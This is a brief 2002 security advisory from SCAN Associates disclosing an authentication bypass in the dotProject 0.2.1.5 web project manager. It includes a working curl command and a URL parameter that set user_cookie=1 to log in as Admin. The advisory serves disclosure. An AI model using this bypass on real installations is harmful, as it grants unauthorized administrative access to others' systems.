SCAN Associates Sdn Bhd Security Advisory Product: dotProject 0.2.1.5 (possibly other) Vendor URL: http://www.dotmarketing.org/dotproject/ Summary: php dotProject by pass authentication Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>, shaharil <shaharil@scan-associates.net> Description =========== dotProject is web base project management system . This application consider as beta version. Details ======= Everyone can bypass authentication and login as Admin. It was rather simple to exploit, user may send a crafted cookie like: curl -b user_cookie=1 http://server/project/index.php?m=projects Or simply append user_cookie=1 in any URL: http://server/project/index.php?m=projects&user_cookie=1 Vendor Response =============== Vendor has been contacted on 24/7/2002 but no reply. www.scan-associates.net <http://www.scan-associates.net>
